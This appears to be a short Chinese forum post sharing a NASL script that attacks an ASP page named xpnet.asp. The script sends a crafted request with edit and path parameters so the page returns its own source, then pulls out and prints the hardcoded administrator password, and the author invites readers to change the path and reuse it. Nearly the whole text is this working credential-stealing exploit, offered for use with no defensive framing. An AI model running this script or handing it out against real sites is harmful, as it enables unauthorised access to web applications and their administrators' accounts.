作者:zhouzhen http://www.powers.com.cn/
port=80;
soc = http_open_socket(port);
send(socket:soc, data:'GET /xpnet.asp?id=edit&path=/xpnet.asp&attrib= HTTP/1.1\r\n');
send(socket:soc, data:'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n');
send(socket:soc, data:'Referer: http://192.168.20.21/xpnet.asp\r\n');
send(socket:soc, data:'Accept-Language: zh-cn\r\n');
send(socket:soc, data:'Accept-Encoding: gzip, deflate\r\n');
send(socket:soc, data:'User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.1.4322)\r\n');
send(socket:soc, data:'Host: 192.168.20.21\r\n');
send(socket:soc, data:'Connection: Keep-Alive\r\n');
send(socket:soc, data:'Cookie: ASPSESSIONIDQSQCCRQA=JEEPCLODEJKNNNHBBKPHNCGI; password=allen\r\n');
send(socket:soc, data:'\r\n');
mes=recv(socket:soc,length:800000);
#display(mes);
line=egrep(pattern:"password.*=.*then",string:mes);
#display(line);
if(line)
{
pass=ereg_replace(pattern:"if trim.request\.form.*password.*=(.*) then",string:line,replace:"\1");
display("password:", pass);
}
呵呵。直接得到密码(不包括引号的部分)。路径大家改改。用 NASL 脚本写的。